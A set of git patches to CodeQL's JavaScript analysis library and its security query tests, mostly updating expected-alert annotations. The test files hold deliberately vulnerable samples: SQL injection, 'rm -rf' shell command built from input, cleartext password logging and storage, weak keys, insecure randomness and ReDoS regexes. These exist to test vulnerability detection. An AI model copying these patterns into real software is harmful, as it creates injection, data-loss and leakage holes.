1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js index 9ed6877e8663..2d82889d7f49 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js @@ -39,7 +39,7 @@ require('express')().get('/foo', (req, res) => { req.params.id, // $ Alert req.params.name, // $ Alert req.params.foo, // OK - not using raw interpolation - ] + ] // $ SPURIOUS: Alert - implicit reads causes flow here in addition to the individual array elements }); db.one({ text: 'SELECT * FROM news where id = ${id}:raw AND name = ${name}', From cf33db78ccdcd8e3d3daf1cb22e75bfbe353c23f Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 11:53:34 +0100 Subject: [PATCH 026/115] JS: Fix the spurious flow --- javascript/ql/lib/semmle/javascript/frameworks/SQL.qll | 5 ++++- .../test/query-tests/Security/CWE-089/untyped/pg-promise.js | 2 +- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll b/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll index 218f2f8366e5..9d106251a211 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/SQL.qll @@ -221,7 +221,10 @@ private module Postgres { /** Gets a value that is plugged into a raw placeholder variable, making it a sink for SQL injection. */ private DataFlow::Node getARawValue() { - result = this.getValues() and this.getARawParameterName() = "1" // Special case: if the argument is not an array or object, it's just plugged into $1 + result = this.getValues() and + this.getARawParameterName() = "1" and // Special case: if the argument is not an array or object, it's just plugged into $1 + not result instanceof DataFlow::ArrayCreationNode and + not result instanceof DataFlow::ObjectLiteralNode or exists(DataFlow::SourceNode values | values = this.getValues().getALocalSource() | result = values.getAPropertyWrite(this.getARawParameterName()).getRhs() diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js index 2d82889d7f49..9ed6877e8663 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js @@ -39,7 +39,7 @@ require('express')().get('/foo', (req, res) => { req.params.id, // $ Alert req.params.name, // $ Alert req.params.foo, // OK - not using raw interpolation - ] // $ SPURIOUS: Alert - implicit reads causes flow here in addition to the individual array elements + ] }); db.one({ text: 'SELECT * FROM news where id = ${id}:raw AND name = ${name}', From c593853710dae13f6d7faa8823fc9e2b2bea10fb Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:00:11 +0100 Subject: [PATCH 027/115] JS: Record some missing alerts in FileAccessToHttp --- .../ql/test/query-tests/Security/CWE-200/googlecompiler.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js index a354777e4921..f7e3a43a087e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js @@ -11,7 +11,7 @@ function PostCode(codestring) { 'output_format': 'json', 'output_info': 'compiled_code', 'warning_level' : 'QUIET', - 'js_code' : codestring // $ Alert - passing data from file to the request json body + 'js_code' : codestring // $ MISSING: Alert - passing data from file to the request json body }); // An object of options to indicate where to post to @@ -34,7 +34,7 @@ function PostCode(codestring) { }); }); - post_req.write(post_data); // $ Alert - post the data from file to request body + post_req.write(post_data); // $ MISSING: Alert - post the data from file to request body post_req.end(); } From 319ee2ccd522682fb1441f8115957ce3b08098a2 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:20:44 +0100 Subject: [PATCH 028/115] JS: Track deep flow through qs.stringify --- .../javascript/frameworks/UriLibraries.qll | 19 +++++++++++++++++++ .../Security/CWE-200/googlecompiler.js | 4 ++-- 2 files changed, 21 insertions(+), 2 deletions(-) diff --git a/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll b/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll index 0a262d154b2b..90dcc886ed43 100644 --- a/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll +++ b/javascript/ql/lib/semmle/javascript/frameworks/UriLibraries.qll @@ -421,3 +421,22 @@ private module ClosureLibraryUri { } } } + +private class QueryStringStringification extends DataFlow::SummarizedCallable { + QueryStringStringification() { this = "query-string stringification" } + + override DataFlow::InvokeNode getACall() { + result = + API::moduleImport(["querystring", "query-string", "querystringify", "qs"]) + .getMember("stringify") + .getACall() or + result = API::moduleImport("url-parse").getMember("qs").getMember("stringify").getACall() or + result = API::moduleImport("parseqs").getMember("encode").getACall() + } + + override predicate propagatesFlow(string input, string output, boolean preservesValue) { + preservesValue = false and + input = ["Argument[0]", "Argument[0].AnyMemberDeep"] and + output = "ReturnValue" + } +} diff --git a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js index f7e3a43a087e..21f88a6d7eed 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js @@ -34,7 +34,7 @@ function PostCode(codestring) { }); }); - post_req.write(post_data); // $ MISSING: Alert - post the data from file to request body + post_req.write(post_data); // $ Alert - post the data from file to request body post_req.end(); } @@ -58,4 +58,4 @@ fs.readFile('LinkedList.js', 'utf-8', function (err, data) { console.log("No data to post"); process.exit(-1); } -}); \ No newline at end of file +}); From e745f42291772beb1920eacd68a3b050284d6d5b Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 28 Feb 2025 13:18:41 +0100 Subject: [PATCH 029/115] JS: Remove alert expectation from step This is just a step on the path, not a sink --- .../ql/test/query-tests/Security/CWE-200/googlecompiler.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js index 21f88a6d7eed..b71ed168533f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js @@ -11,7 +11,7 @@ function PostCode(codestring) { 'output_format': 'json', 'output_info': 'compiled_code', 'warning_level' : 'QUIET', - 'js_code' : codestring // $ MISSING: Alert - passing data from file to the request json body + 'js_code' : codestring // passing data from file to the request json body }); // An object of options to indicate where to post to From d3de6d18a44f673bbe1af779a11955644ff1a1fa Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 28 Feb 2025 13:18:47 +0100 Subject: [PATCH 030/115] JS: Accept other changes to UnusedVariable --- .../Declarations/UnusedVariable/UnusedIndexVariable.js | 2 +- .../ql/test/query-tests/Declarations/UnusedVariable/eval.js | 4 ++-- .../query-tests/Declarations/UnusedVariable/multi-imports.js | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js index 7d76d97b96bb..321a1df2f7b3 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js @@ -1,6 +1,6 @@ function sum(xs, i) { var res = 0; - for(;i++ Date: Tue, 11 Feb 2025 16:38:52 +0100 Subject: [PATCH 031/115] JS: Some more test changes in SpuriousArguments --- .../query-tests/LanguageFeatures/SpuriousArguments/tst.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js index 046ca3aec677..387348232e3d 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js @@ -40,7 +40,7 @@ new String(1, 2, 3); // $ Alert h(function(x) { return x; }); })(function() {}); -parseFloat("123", 10); +parseFloat("123", 10); // $ Alert - unlike parseInt this does not take a radix (function testWhitelistEmptyFunctions(){ function nonEmpty(){ @@ -115,7 +115,7 @@ parseFloat("123", 10); throwerArrow(42); throwerCustom(42); throwerWithParam(42, 87); // $ Alert - throwerIndirect(42); // OK - but still flagged due to complexity + throwerIndirect(42); // $ SPURIOUS: Alert - flagged due to complexity }); function sum2() { From 576dbcb02053f0fb74238c56f2988a4a10439992 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 10:18:24 +0100 Subject: [PATCH 032/115] JS: Stop overriding entire module.exports object in test Doing `module.exports = blah` prevents other exports from being seen as library inputs. --- .../CWE-078/UnsafeShellCommandConstruction/lib/lib.js | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index b6efdbd131a6..77f49ad77017 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js @@ -1,6 +1,6 @@ var cp = require("child_process") -module.exports = function (name) { +module.exports.blah = function (name) { cp.exec("rm -rf " + name); // $ Alert cp.execFile(name, [name]); @@ -19,7 +19,7 @@ function cla() { } cla.prototype.method = function (name) { cp.exec("rm -rf " + name); // $ Alert } -module.exports = new cla(); +module.exports.cla = new cla(); function cla2() { } @@ -474,7 +474,7 @@ const {promisify} = require('util'); const exec = promisify(require('child_process').exec); -module.exports = function check(config) { +module.exports.check = function check(config) { const cmd = path.join(config.installedPath, 'myBinary -v'); // $ Alert return exec(cmd); } From b54ff3b5b3cdf56249e98e9225f1c81f73f60579 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:31:52 +0100 Subject: [PATCH 033/115] JS: Accept an alert --- .../ql/test/query-tests/Security/CWE-312/CleartextStorage2.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-312/CleartextStorage2.js b/javascript/ql/test/query-tests/Security/CWE-312/CleartextStorage2.js index 88385a96ab49..ba26d5bc18e3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/CleartextStorage2.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/CleartextStorage2.js @@ -4,7 +4,7 @@ var url = require('url'); var server = https.createServer(function(req, res) { let pw = url.parse(req.url, true).query.current_password; res.writeHead(200, { - 'Set-Cookie': 'password=' + pw, + 'Set-Cookie': 'password=' + pw, // $ Alert[js/clear-text-storage-of-sensitive-data] 'Content-Type': 'text/plain' }); }); From e91a046a17a35aa11adbc8760659f53346ffbeae Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:33:17 +0100 Subject: [PATCH 034/115] JS: Mark a spurious alert --- javascript/ql/test/query-tests/Security/CWE-312/passwords.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords.js index 686f3d3f4282..af3f1a268a48 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords.js @@ -75,7 +75,7 @@ console.log(config); var temp = { encryptedPassword: req.body.password }; - console.log(temp.encryptedPassword); // OK - XXX + console.log(temp.encryptedPassword); // $ SPURIOUS: Alert[js/clear-text-logging] var secret = password; console.log(`pw: ${secret}`); // $ Alert[js/clear-text-logging] From 51b45598c4682a2158e8a56d96dcf74871ec3a85 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:33:35 +0100 Subject: [PATCH 035/115] JS: Move an alert and add query ID --- .../ql/test/query-tests/Security/CWE-312/passwords.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords.js index af3f1a268a48..73170197965f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords.js @@ -139,19 +139,19 @@ }); function indirectLogCall() { - console.log.apply(this, arguments); + console.log.apply(this, arguments); // $ Alert[js/clear-text-logging] } var Util = require('util'); (function() { var config = { x: password }; - indirectLogCall(config.x); // $ Alert - indirectLogCall(process.env); // $ Alert + indirectLogCall(config.x); + indirectLogCall(process.env); var procdesc = Util.inspect(process.env).replace(/\n/g, '') - indirectLogCall(procdesc); // $ Alert + indirectLogCall(procdesc); console.log(process.env); // $ Alert[js/clear-text-logging] console.log(process.env.PATH); From fc9570234184d86394f66418b31b95f329c27719 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:34:07 +0100 Subject: [PATCH 036/115] JS: Accept some more alerts from CleartextStorage --- .../query-tests/Security/CWE-312/passwords_in_server_1.js | 2 +- .../query-tests/Security/CWE-312/passwords_in_server_2.js | 2 +- .../query-tests/Security/CWE-312/passwords_in_server_3.js | 2 +- .../query-tests/Security/CWE-312/passwords_in_server_4.js | 2 +- .../query-tests/Security/CWE-312/passwords_in_server_5.js | 2 +- .../test/query-tests/Security/CWE-312/tst-webstorage.js | 8 ++++---- 6 files changed, 9 insertions(+), 9 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_1.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_1.js index 50caa0584aa5..b2cabbc9944f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_1.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_1.js @@ -3,4 +3,4 @@ var app = express(); app.get('/some/path', function() { }) -console.log(password); +console.log(password); // $ Alert[js/clear-text-logging] diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_2.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_2.js index a59e8bba77fa..94fd757c33ce 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_2.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_2.js @@ -1,3 +1,3 @@ require("foo"); (function (req, res){}); -console.log(password); +console.log(password); // $ Alert[js/clear-text-logging] diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_3.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_3.js index ea6132502372..118ae5dd2a75 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_3.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_3.js @@ -1,2 +1,2 @@ var server = require("./server"); -console.log(password); +console.log(password); // $ Alert[js/clear-text-logging] diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_4.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_4.js index 53279ea2853a..c47deadde58a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_4.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_4.js @@ -1,2 +1,2 @@ require("foo"); -console.log(password); +console.log(password); // $ Alert[js/clear-text-logging] diff --git a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_5.js b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_5.js index 6070f3d1aebb..d5bb42d5dd07 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_5.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/passwords_in_server_5.js @@ -5,5 +5,5 @@ app.get('/some/path', function() { }) function f(x) { - console.log(x); + console.log(x); // $ Alert[js/clear-text-logging] } diff --git a/javascript/ql/test/query-tests/Security/CWE-312/tst-webstorage.js b/javascript/ql/test/query-tests/Security/CWE-312/tst-webstorage.js index d6adb2fbb75b..43c9e0423e36 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/tst-webstorage.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/tst-webstorage.js @@ -1,4 +1,4 @@ -localStorage.x = data.password; -localStorage.setItem('x', data.password) -sessionStorage.x = data.password; -sessionStorage.setItem('x', data.password) +localStorage.x = data.password; // $ Alert[js/clear-text-storage-of-sensitive-data] +localStorage.setItem('x', data.password) // $ Alert[js/clear-text-storage-of-sensitive-data] +sessionStorage.x = data.password; // $ Alert[js/clear-text-storage-of-sensitive-data] +sessionStorage.setItem('x', data.password) // $ Alert[js/clear-text-storage-of-sensitive-data] From 0f8e85fa2fa1a961c8b15f8dcb4c8f43babd4b81 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:36:10 +0100 Subject: [PATCH 037/115] JS: Accept alerts for InsufficientKeySize --- javascript/ql/test/query-tests/Security/CWE-326/tst.js | 2 +- javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-326/tst.js b/javascript/ql/test/query-tests/Security/CWE-326/tst.js index 3f636a97e966..839d4fcfc816 100644 --- a/javascript/ql/test/query-tests/Security/CWE-326/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-326/tst.js @@ -32,7 +32,7 @@ var bad9 = forge.cipher.createDecipher('3DES-CBC', key3); // $ Alert var key4 = myBuffer.getBytes(16); var good5 = forge.cipher.createDecipher('AES-CBC', key4); -var bad10 = crypto.createDiffieHellman(512); +var bad10 = crypto.createDiffieHellman(512); // $ Alert var good6 = crypto.createDiffieHellman(2048); const NodeRSA = require('node-rsa'); diff --git a/javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs b/javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs index d5e5051af668..1db03f450491 100644 --- a/javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs +++ b/javascript/ql/test/query-tests/Security/CWE-326/tst.xsjs @@ -1,5 +1,5 @@ const crypto = $.require("crypto"); -const bad1 = crypto.generateKeyPairSync("rsa", { modulusLength: 1024 }); // NOT OK +const bad1 = crypto.generateKeyPairSync("rsa", { modulusLength: 1024 }); // $ Alert const good1 = crypto.generateKeyPairSync("rsa", { modulusLength: 4096 }); // OK From 92c39394576da5a363f9256e6020e181566a6284 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 18 Feb 2025 13:19:37 +0100 Subject: [PATCH 038/115] JS: Accept InsecureRandomness alerts --- javascript/ql/test/query-tests/Security/CWE-338/tst.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-338/tst.js b/javascript/ql/test/query-tests/Security/CWE-338/tst.js index d8d0c1adcb74..d22bcc5d6df2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-338/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-338/tst.js @@ -87,12 +87,12 @@ function f17() { } function f18() { - var secret = (o.password = Math.random()); + var secret = (o.password = Math.random()); // $ Alert } (function(){ var crypto = require('crypto'); - crypto.createHmac('sha256', Math.random()); + crypto.createHmac('sha256', Math.random()); // $ Alert })(); (function () { @@ -118,7 +118,7 @@ function uid() { var my_nice_uid = Math.floor(Math.random() * 4_000_000_000); // $ Alert var liquid = Math.random(); var UUID = Math.random(); // $ Alert - var MY_UID = Math.random(); // NOK OK + var MY_UID = Math.random(); // $ Alert } function buildPass(opts, length) { @@ -136,4 +136,4 @@ function buildPass(opts, length) { password += chars[Math.floor(Math.random() * chars.length)]; // $ Alert } return password; -} \ No newline at end of file +} From 283b14207dfb82901dcb198505411d07f0461bf3 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 09:18:56 +0100 Subject: [PATCH 039/115] JS: Accept some ReDoS alerts --- .../Security/CWE-400/ReDoS/highlight.js | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/highlight.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/highlight.js index f12d49ba07ae..7677dad3f53d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/highlight.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/highlight.js @@ -1,39 +1,39 @@ // routeros -var bad = /(\.\.\/|\/|\s)((traffic-flow|traffic-generator|firewall|scheduler|aaa|accounting|address-list|address|align|area|bandwidth-server|bfd|bgp|bridge|client|clock|community|config|connection|console|customer|default|dhcp-client|dhcp-server|discovery|dns|e-mail|ethernet|filter|firewall|firmware|gps|graphing|group|hardware|health|hotspot|identity|igmp-proxy|incoming|instance|interface|ip|ipsec|ipv6|irq|l2tp-server|lcd|ldp|logging|mac-server|mac-winbox|mangle|manual|mirror|mme|mpls|nat|nd|neighbor|network|note|ntp|ospf|ospf-v3|ovpn-server|page|peer|pim|ping|policy|pool|port|ppp|pppoe-client|pptp-server|prefix|profile|proposal|proxy|queue|radius|resource|rip|ripng|route|routing|screen|script|security-profiles|server|service|service-port|settings|shares|smb|sms|sniffer|snmp|snooper|socks|sstp-server|system|tool|tracking|type|upgrade|upnp|user-manager|users|user|vlan|secret|vrrp|watchdog|web-access|wireless|pptp|pppoe|lan|wan|layer7-protocol|lease|simple|raw);?\s)+X/; +var bad = /(\.\.\/|\/|\s)((traffic-flow|traffic-generator|firewall|scheduler|aaa|accounting|address-list|address|align|area|bandwidth-server|bfd|bgp|bridge|client|clock|community|config|connection|console|customer|default|dhcp-client|dhcp-server|discovery|dns|e-mail|ethernet|filter|firewall|firmware|gps|graphing|group|hardware|health|hotspot|identity|igmp-proxy|incoming|instance|interface|ip|ipsec|ipv6|irq|l2tp-server|lcd|ldp|logging|mac-server|mac-winbox|mangle|manual|mirror|mme|mpls|nat|nd|neighbor|network|note|ntp|ospf|ospf-v3|ovpn-server|page|peer|pim|ping|policy|pool|port|ppp|pppoe-client|pptp-server|prefix|profile|proposal|proxy|queue|radius|resource|rip|ripng|route|routing|screen|script|security-profiles|server|service|service-port|settings|shares|smb|sms|sniffer|snmp|snooper|socks|sstp-server|system|tool|tracking|type|upgrade|upnp|user-manager|users|user|vlan|secret|vrrp|watchdog|web-access|wireless|pptp|pppoe|lan|wan|layer7-protocol|lease|simple|raw);?\s)+X/; // $ Alert[js/redos] var good = /(\.\.\/|\/|\s)((traffic-flow|traffic-generator|firewall|scheduler|aaa|accounting|address-list|address|align|area|bandwidth-server|bfd|bgp|bridge|client|clock|community|config|connection|console|customer|default|dhcp-client|dhcp-server|discovery|dns|e-mail|ethernet|filter|firmware|gps|graphing|group|hardware|health|hotspot|identity|igmp-proxy|incoming|instance|interface|ip|ipsec|ipv6|irq|l2tp-server|lcd|ldp|logging|mac-server|mac-winbox|mangle|manual|mirror|mme|mpls|nat|nd|neighbor|network|note|ntp|ospf|ospf-v3|ovpn-server|page|peer|pim|ping|policy|pool|port|ppp|pppoe-client|pptp-server|prefix|profile|proposal|proxy|queue|radius|resource|rip|ripng|route|routing|screen|script|security-profiles|server|service|service-port|settings|shares|smb|sms|sniffer|snmp|snooper|socks|sstp-server|system|tool|tracking|type|upgrade|upnp|user-manager|users|user|vlan|secret|vrrp|watchdog|web-access|wireless|pptp|pppoe|lan|wan|layer7-protocol|lease|simple|raw);?\s)+X/; // powershell -var bad = /(Add|Clear|Close|Copy|Enter|Exit|Find|Format|Get|Hide|Join|Lock|Move|New|Open|Optimize|Pop|Push|Redo|Remove|Rename|Reset|Resize|Search|Select|Set|Show|Skip|Split|Step|Switch|Undo|Unlock|Watch|Backup|Checkpoint|Compare|Compress|Convert|ConvertFrom|ConvertTo|Dismount|Edit|Expand|Export|Group|Import|Initialize|Limit|Merge|New|Out|Publish|Restore|Save|Sync|Unpublish|Update|Approve|Assert|Complete|Confirm|Deny|Disable|Enable|Install|Invoke|Register|Request|Restart|Resume|Start|Stop|Submit|Suspend|Uninstall|Unregister|Wait|Debug|Measure|Ping|Repair|Resolve|Test|Trace|Connect|Disconnect|Read|Receive|Send|Write|Block|Grant|Protect|Revoke|Unblock|Unprotect|Use|ForEach|Sort|Tee|Where)+(-)[\w\d]+/; +var bad = /(Add|Clear|Close|Copy|Enter|Exit|Find|Format|Get|Hide|Join|Lock|Move|New|Open|Optimize|Pop|Push|Redo|Remove|Rename|Reset|Resize|Search|Select|Set|Show|Skip|Split|Step|Switch|Undo|Unlock|Watch|Backup|Checkpoint|Compare|Compress|Convert|ConvertFrom|ConvertTo|Dismount|Edit|Expand|Export|Group|Import|Initialize|Limit|Merge|New|Out|Publish|Restore|Save|Sync|Unpublish|Update|Approve|Assert|Complete|Confirm|Deny|Disable|Enable|Install|Invoke|Register|Request|Restart|Resume|Start|Stop|Submit|Suspend|Uninstall|Unregister|Wait|Debug|Measure|Ping|Repair|Resolve|Test|Trace|Connect|Disconnect|Read|Receive|Send|Write|Block|Grant|Protect|Revoke|Unblock|Unprotect|Use|ForEach|Sort|Tee|Where)+(-)[\w\d]+/; // $ Alert[js/redos] var good = /(Add|Clear|Close|Copy|Enter|Exit|Find|Format|Get|Hide|Join|Lock|Move|New|Open|Optimize|Pop|Push|Redo|Remove|Rename|Reset|Resize|Search|Select|Set|Show|Skip|Split|Step|Switch|Undo|Unlock|Watch|Backup|Checkpoint|Compare|Compress|Convert|ConvertFrom|ConvertTo|Dismount|Edit|Expand|Export|Group|Import|Initialize|Limit|Merge|Out|Publish|Restore|Save|Sync|Unpublish|Update|Approve|Assert|Complete|Confirm|Deny|Disable|Enable|Install|Invoke|Register|Request|Restart|Resume|Start|Stop|Submit|Suspend|Uninstall|Unregister|Wait|Debug|Measure|Ping|Repair|Resolve|Test|Trace|Connect|Disconnect|Read|Receive|Send|Write|Block|Grant|Protect|Revoke|Unblock|Unprotect|Use|ForEach|Sort|Tee|Where)+(-)[\w\d]+/; // perl -var bad = /(s|tr|y)\/(\\.|[^/])*\/(\\.|[^/])*\/[a-z]*/m; +var bad = /(s|tr|y)\/(\\.|[^/])*\/(\\.|[^/])*\/[a-z]*/m; // $ Alert[js/redos] var good = /(s|tr|y)\/(\\.|[^\\\/])*\/(\\.|[^\\\/])*\/[dualxmsipn]{0,12}/m; // gams -var bad = /([ ]*[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)+X/; +var bad = /([ ]*[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)+X/; // $ Alert[js/redos] var good = /[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+([ ]+[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)*/im; // handlebars -var bad = /('.*?'|".*?"|\[.*?\]|[^\s!"#%&'()*+,.\/;<=>@\[\\\]^`{|}~]+|\.|\/)+X/; +var bad = /('.*?'|".*?"|\[.*?\]|[^\s!"#%&'()*+,.\/;<=>@\[\\\]^`{|}~]+|\.|\/)+X/; // $ Alert[js/redos] var good = /(\.|\.\/|\/)?(""|"[^"]+"|''|'[^']+'|\[\]|\[[^\]]+\]|[^\s!"#%&'()*+,.\/;<=>@\[\\\]^`{|}~]+)((\.|\/)(""|"[^"]+"|''|'[^']+'|\[\]|\[[^\]]+\]|[^\s!"#%&'()*+,.\/;<=>@\[\\\]^`{|}~]+))*/im; // c-like -var bad = /((decltype\(auto\)|(?:[a-zA-Z_]\w*::)?[a-zA-Z_]\w*(?:<.*?>)?)[\*&\s]+)+(?:[a-zA-Z_]\w*::)?[a-zA-Z]\w*\s*\(/m; +var bad = /((decltype\(auto\)|(?:[a-zA-Z_]\w*::)?[a-zA-Z_]\w*(?:<.*?>)?)[\*&\s]+)+(?:[a-zA-Z_]\w*::)?[a-zA-Z]\w*\s*\(/m; // $ Alert[js/redos] var good = /((decltype\(auto\)|([a-zA-Z_]\w*::)?[a-zA-Z_]\w*(<[^<>]+>)?)[\*&\s]+)+([a-zA-Z_]\w*::)?[a-zA-Z]\w*\s*\(/m; // jboss-cli -var bad = /\B(([\/.])[\w\-.\/=]+)+X/; +var bad = /\B(([\/.])[\w\-.\/=]+)+X/; // $ Alert[js/redos] var good = /\B([\/.])[\w\-.\/=]+X/; // r -var bad = /`(?:\\.|[^`])+`/m; +var bad = /`(?:\\.|[^`])+`/m; // $ Alert[js/redos] var good = /`(?:\\.|[^`\\])+`/; // erlang-repl -var bad = /\?(::)?([A-Z]\w*(::)?)+X/; +var bad = /\?(::)?([A-Z]\w*(::)?)+X/; // $ Alert[js/redos] var good = /\?(::)?([A-Z]\w*)((::)[A-Z]\w*)*X/; // javascript -var bad = /[a-zA-Z_]\w*\([^()]*(\([^()]*(\([^()]*\))*[^()]*\))*[^()]*\)\s*\{/m; +var bad = /[a-zA-Z_]\w*\([^()]*(\([^()]*(\([^()]*\))*[^()]*\))*[^()]*\)\s*\{/m; // $ Alert[js/redos] var good = /[a-zA-Z_]\w*\([^()]*(\([^()]*(\([^()]*\)[^()]*)*\)[^()]*)*\)\s*\{/m; From d298d8740f8fdc93b237843a4fd877cb7c191f37 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 09:29:38 +0100 Subject: [PATCH 040/115] JS: Accept some exponenital redos alerts in the polynomial redos test suite --- 